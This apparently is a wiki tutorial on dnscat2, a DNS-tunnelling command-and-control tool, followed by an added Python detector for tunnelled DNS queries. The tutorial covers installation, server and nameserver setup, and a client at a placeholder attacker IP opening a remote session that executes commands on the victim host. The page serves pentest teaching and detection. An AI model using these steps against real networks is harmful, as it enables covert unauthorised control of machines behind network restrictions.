From charlesreid1

Overview

What is it?

dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.

There are two ways of running dnscat2:

  • In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.
  • In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.

Installing

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
Usage

Direct DNS Mode

Running the server

When you run the server in direct DNS mode, no arguments are required:

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)

Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 12199
dnscat2>

Now, you can connect to the particular interactive session with that number:

dnscat2> session -i 12199
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 12199]> exec calc.exe
Sent request to execute
dnscat [command: 12199]>

Running the client

On Linux:

./dnscat --host 101.202.303.404

On Windows:

C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404
Proxy DNS Mode

DNS Setup

The C2 server needs a registered domain and must be that domain's authoritative DNS server; in other words, the authoritative nameserver and the dnscat2 server should be the same machine.

Here's how to set that up:

  • Suppose you are using example.com as the domain
  • Add two new A records that will be the nameserver subdomains, and will both point to the dnscat2 server IP address:
    • ns1.example.com
    • ns2.example.com
  • Now you should inform the domain registrar that the authoritative DNS server for this domain is the dnscat2 server
    • Set up the domain to use your own, custom nameservers
    • Add the nameservers ns1.example.com and ns2.example.com

Give some time for settings to take effect.

Now, when you run dnscat2 on the server, you pass the example.com domain as an argument (instead of running it with no arguments), and on the client you give the example.com domain instead of the host IP.
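Both modes above produce the same observable on the defender's side: a stream of queries for long, random-looking subdomains under one registered domain, often using data-rich record types. The following detector is an added example (not part of this page or of the dnscat2 project) that scores such queries over a constructed resolver log; the log format, the thresholds and the tunnel.example.net names are assumptions made for illustration.

```python
import math
from collections import defaultdict

# Constructed sample resolver log (not captured from any real system), one query
# per line as "client qtype qname". The tunnel-like names mimic encoded-payload
# subdomains under a delegated zone (example.net here, by assumption).
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 TXT 3f2a9c1d0e7b6a5b.4c3d2e1f0a9b8c7d6e5f4a3b.tunnel.example.net
10.0.0.5 TXT 9b8c7d6e5f4a3b2c.1f0a9b8c7d6e5f4a3b2c1d0e.tunnel.example.net
10.0.0.7 A mail.example.com
10.0.0.5 CNAME c1d0e7b3f2a9b8c7.d6e5f4a3b2c1d0e9f8a7b6c5.tunnel.example.net
10.0.0.5 MX 7d6e5f4a3b2c1d0e.f9a8b7c6d5e4f3a2b1c0d9e8.tunnel.example.net
"""

def shannon_entropy(s):
    """Bits per character; random-looking (encoded) labels score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname):
    # Assumption: two-label registered domains only (no public-suffix list).
    return ".".join(qname.split(".")[-2:])

def score_query(qtype, qname):
    """Return the tunnelling indicators triggered by a single query."""
    labels = qname.split(".")
    payload = "".join(labels[:-2])          # everything below the registered domain
    reasons = []
    if len(qname) > 50:
        reasons.append("long_qname")
    if any(len(label) >= 20 for label in labels):
        reasons.append("long_label")
    if shannon_entropy(payload) > 3.5:
        reasons.append("high_entropy")
    if qtype in ("TXT", "CNAME", "MX"):     # record types that carry more data
        reasons.append("data_rich_qtype")
    return reasons

def analyze(log_text, min_flagged=3):
    """Map registered domain -> flagged query count, keeping domains at or above min_flagged."""
    flagged = defaultdict(int)
    for line in log_text.strip().splitlines():
        _client, qtype, qname = line.split()
        qname = qname.rstrip(".").lower()
        if len(score_query(qtype.upper(), qname)) >= 2:   # two indicators = suspicious
            flagged[registered_domain(qname)] += 1
    return {d: n for d, n in flagged.items() if n >= min_flagged}
```

Because every tunnelled packet becomes a new, never-before-seen name, counting flagged queries per registered domain is what separates the tunnel zone from ordinary traffic to the same resolver.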

Resources

https://web.archive.org/web/20160311081612/https://www.doctorchaos.com/dnscat2-dns-reverse-tunneling-thru-secure-networks/

https://zeltser.com/c2-dns-tunneling/

GitHub: https://github.com/iagox86/dnscat2


Flags